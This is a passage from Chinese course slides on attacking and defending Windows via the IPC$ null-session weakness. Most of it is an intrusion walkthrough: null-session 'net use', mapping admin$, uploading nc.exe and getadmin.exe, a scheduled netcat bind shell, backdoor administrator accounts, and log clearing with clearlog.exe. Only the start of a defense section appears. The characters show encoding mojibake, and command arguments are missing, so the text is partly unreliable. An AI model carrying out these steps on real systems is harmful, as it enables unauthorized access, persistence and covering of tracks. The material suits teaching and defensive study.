《網(wǎng)絡(luò)攻擊與防御》專題課件-1：IPC$漏洞（20140903更新）

1、IPC$漏洞什么是IPC$?在win NT/2000環(huán)境下 , IPC$(Inter-Process Communication)，它是為了讓進程間網(wǎng)絡(luò)通信而開放的主機間的連接。通過提供可信任的用戶名和口令，連接雙方可以建立安全的通道并以此通道進行加密數(shù)據(jù)的交換，從而實現(xiàn)對遠程計算機的訪問。IPC$的特點兩臺主機間任何時候只允許有一個IPC$連接。Windows Server 2003上使用139端口。連接時需提供用戶名跟密碼。允許空連接，即用戶名和密碼為空。致命漏洞IPC$連接建立后，被連接的主機沒有把對方的活動限制在進程間通信范圍內(nèi)，而是允許對方越權(quán)訪問非IPC$的共享資源。戰(zhàn)云：攻擊準備

2、寶貝你好嗎:空連接net use ipc$ “” /user : “”竊聽：使用嗅探工具，如sniffer pro偷窺：使用掃描工具，如X-Scan斗智：使用密碼猜測工具，如流光若攻擊機是Win7，安裝Telnet服務(wù)。注意：空連接建立后用以下命令刪除： net use * /del閃擊：連接咒語：建立ipc$連接 net use ipc$ “” /user:“”越界：映射對方機器其他共享（例如admin$）到本機（例如Z盤） net use z: admin$ 閃擊：連接上傳木馬程序 把黑客工具nc.exe拷到z盤 把通用DOS命令窗口工具cmd.exe拷到z盤 把提權(quán)工具gasys.dll

3、, getadmin.exe拷到z盤 閃擊：連接定時炸彈：向?qū)Ψ綑C器添加定時任務(wù)，在給定時間啟動cmd.exe, 并把界面輸出到指定端口。 net time 【得到對方時間】 at nc-l-p -t -e cmd.exe 【使對方在啟動DOS窗口，并輸出到對方的端口?！?閃擊：連接地獄之門：登錄到定時炸彈炸開的端口得到一個shell（命令窗口） telnet 不要高興得太早：權(quán)限不夠滲透：提權(quán)漏洞之后的漏洞 NT核心進程WinLogon可被非法使用, 用來把任何用戶加入管理員組。 王牌出場：運行提權(quán)程序在shell中執(zhí)行g(shù)etadmin.exe。 當(dāng)家作主：破壞篡改主頁上傳木馬格式化硬盤不忍

4、說再見：后門咸魚翻身：激活凍結(jié)賬戶 net user /active:yes 潛伏：添加用戶 net user /add 【shell中執(zhí)行】重要人物：提升潛伏用戶的權(quán)限 net localgroup administrators /add 【shell中執(zhí)行，使用戶成為超級管理員】 net localgroup “remote desktop users” /add【shell中執(zhí)行，使用戶可遠程登錄】打掃戰(zhàn)場：痕跡清理清除指紋：如前面用過的cmd.exe, nc.exe, getadmin.exe, gasys.dll清除日志：使用clearlog.exe, cleaniis.exe道高一丈：防范1、禁止空連接進行枚舉(此操作并不能阻止空連接在的建立) 2、禁止默